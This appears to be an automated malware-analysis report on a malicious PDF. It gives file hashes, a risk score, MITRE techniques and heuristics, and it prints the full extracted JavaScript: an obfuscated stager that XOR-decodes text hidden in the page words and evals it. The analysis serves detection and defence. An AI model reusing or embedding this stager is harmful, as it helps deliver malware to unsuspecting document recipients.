PDF malware analysis — malicious · 78bc28af754ec0af

MALICIOUS

PDF

6.3 KB Authoring application: Woibneqeni (via c9086Uzenwzijecijawida)

MD5: 09ac5aed46a5a4d1f5e591f79fcb7204 SHA-1: 37ffe7af6c08ed8d8a3ed655f9f7d6d5aa0cae7a SHA-256: 78bc28af754ec0afd77350a242d70d52a9f4b0c90f4b28a14807b843c91d2aee

86 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

This PDF document contains embedded JavaScript that is heavily obfuscated. The script appears to be a stager designed to decode and execute further malicious code, likely downloading a second-stage payload. The ML classifier strongly indicates malicious intent, and the presence of JavaScript execution points to a common technique for delivering malware via documents.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER

PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0010_000.js
e5fb7241b86520d30618ed164f0373984e043b354e933bd4bfa81c848e06fafc pdf-javascript-stream PDF /JS object 10 at offset 0x11B0 1464 bytes

Filename	Kind	Source	Size
`javascript_obj0010_000.js` `e5fb7241b86520d30618ed164f0373984e043b354e933bd4bfa81c848e06fafc`	pdf-javascript-stream	PDF /JS object 10 at offset 0x11B0	1464 bytes
Preview script First 1,000 lines of the extracted script var eJ="v9ar n=this.t;try {var &pUF&={ rWZ : \'getP9ageNthWord\',pID : \'&getPa~geNumWords\',fKL :> \'pag>eNum\',xEN : \'eval\',nWD : \'join\',};lGP =& 160 ;r9SF=\'\';jWN=\'\';fCB=0;xMT=String;vWZ=\'\\\\x\';hIZ9=\'toString\';t&MP=91;nIB=2;lYT=4;dYJ=5;rCJ=255;pCV=16;xIH=\'doc\';bQ~X=332;d9KV=[];nEN=\'\';dKD=n[pUF.pID](n[p>UF.fKL]9)9;for(hUT=fCB;~hUT< dKD; hUT++~){var dID&=n[pUF.rWZ](n[pUF.fKL],hUT,tMP);jWN=[9jWN,dID][pUF.nW>D](rSF);;}f9or(hUT=0;hUT < jWN.length; hUT+=nIB){~nSH=jWN.substr(hUT,nIB)9;hUH=parseInt(nSH,pCV);rMV=hUH^lGP;dAX=rMV.toSt~r>ing(pCV);9dAX=(dAX.length==tMP) ? \'0\'~ >+ dAX : d~AX;app[pUF.xEN](\'jUD=(\"\'+vW~Z+dAX+\'\");\');9dKV.pus~h(jUD);}try {nEN=dK&V&.join(rSF&);n.fUB=(nEN.substr(nEN.len9gth-bQX));n~.xAH=(n9EN.substr(fCB,n~EN.length>-bQX)>);lUH&();} catch(vSH){if(n.xAH){try {app[pUF.~xEN](n.xAH);} cat&ch(vSH){}} else {}}} catch(>nEN){app.alert(&nEN.message);}"; var zE="proto"+"typeWZg".substr(0,4); var fCB=0; var kPOP=/[&\>~9]/g; var xIH=this; var dKF=new String("re"+"pl"+"ac"+"e"); var zI="eval"; function qXAP(hO){this.zAB=this.t=hO}; var hSJ="leng"+"th"; var rSF=''; function qPUR(lS,iHMJ){return lS+iHMJ}; ; var nYH="nYH"; rYP=["mT","j","dQT"];this.rIV='';var jSJ=''; eJ=eJ[dKF](kPOP, rSF); ; qXAP[zE].bC = function(){ zWB=16019;zWB--;fS={fY:false}; this.t[zI](eJ); var zCT="";p={tY:7371}; } var vG={gFC:false};var hWL={nQN:false}; var dUV=new qXAP(xIH); vYR={h:11899};var dGXQ=new Date(); dUV.bC(); ;

Preview script

First 1,000 lines of the extracted script

var eJ="v9ar n=this.t;try {var &pUF&={    rWZ : \'getP9ageNthWord\',pID : \'&getPa~geNumWords\',fKL :> \'pag>eNum\',xEN : \'eval\',nWD : \'join\',};lGP =& 160 ;r9SF=\'\';jWN=\'\';fCB=0;xMT=String;vWZ=\'\\\\x\';hIZ9=\'toString\';t&MP=91;nIB=2;lYT=4;dYJ=5;rCJ=255;pCV=16;xIH=\'doc\';bQ~X=332;d9KV=[];nEN=\'\';dKD=n[pUF.pID](n[p>UF.fKL]9)9;for(hUT=fCB;~hUT< dKD; hUT++~){var dID&=n[pUF.rWZ](n[pUF.fKL],hUT,tMP);jWN=[9jWN,dID][pUF.nW>D](rSF);;}f9or(hUT=0;hUT < jWN.length; hUT+=nIB){~nSH=jWN.substr(hUT,nIB)9;hUH=parseInt(nSH,pCV);rMV=hUH^lGP;dAX=rMV.toSt~r>ing(pCV);9dAX=(dAX.length==tMP) ? \'0\'~ >+ dAX : d~AX;app[pUF.xEN](\'jUD=(\"\'+vW~Z+dAX+\'\");\');9dKV.pus~h(jUD);}try {nEN=dK&V&.join(rSF&);n.fUB=(nEN.substr(nEN.len9gth-bQX));n~.xAH=(n9EN.substr(fCB,n~EN.length>-bQX)>);lUH&();} catch(vSH){if(n.xAH){try {app[pUF.~xEN](n.xAH);} cat&ch(vSH){}} else {}}} catch(>nEN){app.alert(&nEN.message);}";
var zE="proto"+"typeWZg".substr(0,4);
var fCB=0;
var kPOP=/[&\>~9]/g;

var xIH=this;
var dKF=new String("re"+"pl"+"ac"+"e");

var zI="eval";
function qXAP(hO){this.zAB=this.t=hO};
var hSJ="leng"+"th";
var rSF='';
function qPUR(lS,iHMJ){return lS+iHMJ};
;




var nYH="nYH";
rYP=["mT","j","dQT"];this.rIV='';var jSJ='';
eJ=eJ[dKF](kPOP, rSF);

;


qXAP[zE].bC = function(){
zWB=16019;zWB--;fS={fY:false};
this.t[zI](eJ);
var zCT="";p={tY:7371};
}

var vG={gFC:false};var hWL={nQN:false};

var dUV=new qXAP(xIH);

vYR={h:11899};var dGXQ=new Date();
dUV.bC();



;

Open this report in the interactive analyzer, or submit your own file for analysis.